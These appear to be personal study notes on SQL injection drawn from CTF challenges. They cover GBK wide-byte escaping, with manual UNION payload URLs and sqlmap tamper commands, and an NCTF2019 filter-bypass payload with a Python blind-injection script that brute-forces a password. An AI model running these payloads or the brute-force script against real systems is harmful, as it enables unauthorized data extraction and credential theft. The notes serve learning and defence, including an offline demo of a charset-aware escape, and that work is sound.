Updated whenever I get around to it ~ notes from my SQL injection study
Wide-byte injection
This section is reproduced from
https://blog.csdn.net/dyw_666666/article/details/88676863
Wide-byte injection refers to the situation where the MySQL database, when using a wide-byte (GBK) encoding, treats two bytes as one Chinese character (the leading byte must be an ASCII value greater than 128, e.g. %df, to fall into the Chinese-character range). When we enter a single quote, MySQL calls an escaping function that turns it into \', and the hex of \ is %5c. Under GBK encoding, MySQL treats %df%5c as a single wide character, namely '運', so the single quote is no longer escaped (it "escapes" the escaping), which makes injection possible.
Challenge URL: http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1
Manual injection
Determining the number of columns
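The mechanism above, as an added example that is not part of the original post: a byte-oriented escape (the addslashes-style behaviour the text describes) is reproduced in pure Python and checked against a GBK decode, next to a charset-aware escape that closes the gap. The function names are my own; no MySQL server is needed.

```python
# Added example (not from the original post): why a byte-oriented escape such as
# PHP addslashes() is defeated once the server decodes the bytes as GBK, plus a
# charset-aware escape that closes the gap. Runs offline, no MySQL required.

def addslashes(data: bytes) -> bytes:
    """Byte-oriented escape: put a backslash (0x5c) before ' " \\ and NUL."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def has_unescaped_quote(data: bytes, charset: str) -> bool:
    """Decode as the server would and report whether a single quote survives
    without a backslash in front of it (the condition an injection needs)."""
    text = data.decode(charset, errors="replace")
    pending_escape = False
    for ch in text:
        if pending_escape:
            pending_escape = False       # this char is consumed by the backslash
        elif ch == "\\":
            pending_escape = True
        elif ch == "'":
            return True
    return False

def wide_byte_bypass_works(user_input: bytes, server_charset: str) -> bool:
    """True when escaping the raw bytes still leaves an injectable quote."""
    return has_unescaped_quote(addslashes(user_input), server_charset)

def charset_aware_escape(data: bytes, charset: str) -> bytes:
    """Decode with the real connection charset first, then escape per
    character, so a backslash can never be absorbed into a multibyte char
    (what mysql_real_escape_string does when the charset is set correctly)."""
    text = data.decode(charset, errors="replace")
    escaped = "".join("\\" + c if c in "'\"\\\x00" else c for c in text)
    return escaped.encode(charset, errors="replace")

if __name__ == "__main__":
    probe = b"\xdf'"                              # the %df%27 from the post
    print(addslashes(probe))                      # b"\xdf\\'"
    print(addslashes(probe).decode("gbk"))        # one CJK char, then a free quote
    print(wide_byte_bypass_works(probe, "gbk"))   # True: 0xdf swallows the 0x5c
    print(wide_byte_bypass_works(probe, "utf-8")) # False: no wide char is formed
    print(has_unescaped_quote(charset_aware_escape(probe, "gbk"), "gbk"))  # False
```

The same check applied to other lead bytes in the 0x81-0xFE range shows the problem is the charset mismatch, not the specific byte %df; parameterized queries avoid the issue entirely.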
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 1%23
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 2%23
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 3%23
order by 3 errors out, so there are two columns
Miscellaneous information
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 union select 2,(concat_ws(char(32,58,32),user(),database(),version()))%23
Database name
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 union select 2,database()%23
Table names
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 union select 2,group_concat(table_name) from information_schema.tables where table_schema=database()%23
Column names
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 union select 2,group_concat(column_name) from information_schema.columns where table_name=0x63746634%23
Here the table name ctf4 has to be converted to hex, and the result prefixed with 0x
Data in the column
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 union select 2,(select flag from ctf4)%23
Running it with sqlmap
This requires the tamper script unmagicquotes.py
Listing the databases
sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes --dbs
Table names
sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` --tables
Column names
sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` -T ctf4 --columns
Data in the column
sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` -T ctf4 -C flag
SQL injection bypass
The challenge is SQLi from NCTF2019
Content reproduced from https://ctf.ieki.xyz/contest/nctf2019.html , p3rh4ps's writeup
Here is an article on bypass techniques
- This challenge bans ' as well as the comment methods (such as # and --), so the usual ways of closing the final passwd quote no longer work
- The bypass trick here: a single quote can be escaped with \ to get around the filter, or can be replaced with ||, = can be replaced with regexp, and for closing the final single quote, %00 can do it
- payload
username=\
passwd=||(passwd/**/regexp/**/"^xxxxx")%00
Below is a script that brute-forces the password one character at a time
import requests

url = 'http://f9a74750-92dc-407e-96a7-eda6b4a9b507.node3.buuoj.cn'


def str2hex(string):
    # Turn the string into a MySQL hex literal (0x...) so the payload needs no quotes
    c = '0x'
    a = ''
    for i in string:
        a += hex(ord(i))
    return c + a.replace('0x', '')


def sqli(payload):
    # Boolean condition on passwd; the trailing NUL byte closes the final quote
    poc = '||passwd/**/REGEXP/**/{};\x00'.format(payload)
    data = {
        'username': '\\',
        'passwd': poc
    }
    a = requests.post(url, data=data, allow_redirects=False)
    if a.status_code == 302:
        # a redirect means the login succeeded, i.e. the regexp matched
        return payload
    if a.status_code != 200 and a.status_code != 302:
        # any other status (network hiccup etc.): retry the same payload
        return sqli(payload)
    return ''


alphabet = ['!', '|', '[', ']', '{', '}', '_', '/', '-', '&', '%', '#', '@',
            'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
            'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
            'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
            'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z',
            '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
password = '^'  # regexp anchor: match from the start of the password

while True:
    for i in alphabet:
        mid = password + i
        a = str2hex(mid)
        b = sqli(a)
        if b != '':
            # this character extends the prefix match: keep it and move on
            password += i
            break
    else:
        # no character extends the match any further: the password is complete
        break
    print(password.replace('^', ''))
This yields the password you_will_never_know7788990; logging in with username \ and that password gives the flag